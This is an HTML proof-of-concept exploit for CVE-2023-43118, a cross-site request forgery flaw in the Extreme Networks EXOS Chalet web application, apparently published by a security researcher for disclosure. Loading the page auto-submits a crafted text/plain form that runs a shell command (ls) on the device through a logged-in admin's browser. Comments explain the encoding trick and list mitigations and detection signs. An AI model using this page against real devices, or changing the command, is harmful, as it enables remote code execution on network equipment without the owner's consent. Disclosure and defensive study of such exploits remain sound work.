<!--
Author: Dave Yesland @daveysec with Rhino Security Labs
CVE: CVE-2023-43118 
This demonstrates a CSRF vulnerability in Extreme Networks EXOS v32.1.1.6.
Opening this page in a browser that is authenticated to an admin account of the
EXOS Chalet web application results in code execution on the underlying OS,
using the 'run script shell ls' command sent through the jsonrpc endpoint.
-->
<html>
  <body>
    <!--
      Cross-site request: the form posts to the target's jsonrpc endpoint with
      enctype="text/plain". The browser serializes a text/plain form body as
      name=value, so the entity-encoded JSON prefix held in the input's name
      and the closing '"}' held in its value are joined into a single JSON
      document; the '=' the browser inserts lands inside the dummy "x" string
      and the body stays well-formed JSON. The victim's browser attaches its
      own session cookies to the request.
    -->
    <!--
      Defender note: this only works because the endpoint accepts a
      cross-origin POST carrying a "simple" Content-Type (text/plain) and does
      not appear to require an anti-CSRF token or to check the Origin header.
      Mitigations: reject any Content-Type other than application/json,
      require a custom request header that a cross-origin form cannot set,
      validate Origin/Referer, and mark the session cookie SameSite.
      Detection: POSTs to /jsonrpc/ with Content-Type text/plain, or with an
      Origin that is not the device itself.
    -->
    <form action="http://<SERVER_IP_HERE>/jsonrpc/" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;jsonrpc&quot;&#58;&#32;&quot;2&#46;0&quot;&#44;&quot;method&quot;&#58;&#32;&quot;cli&quot;&#44;&quot;params&quot;&#58;&#91;&quot;run&#32;script&#32;shell&#32;ls&quot;&#93;&#44;&quot;id&quot;&#58;&quot;1&quot;&#44;&quot;x&quot;&#58;&quot;" value='"}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Rewrites the current history entry's URL (and the document URL) to '/'
      // before the form is submitted.
      history.pushState('', '', '/');
      // Auto-submits the first form on the page, so simply loading the page
      // triggers the request; the visible submit button is never needed.
      document.forms[0].submit();
    </script>
  </body>
</html>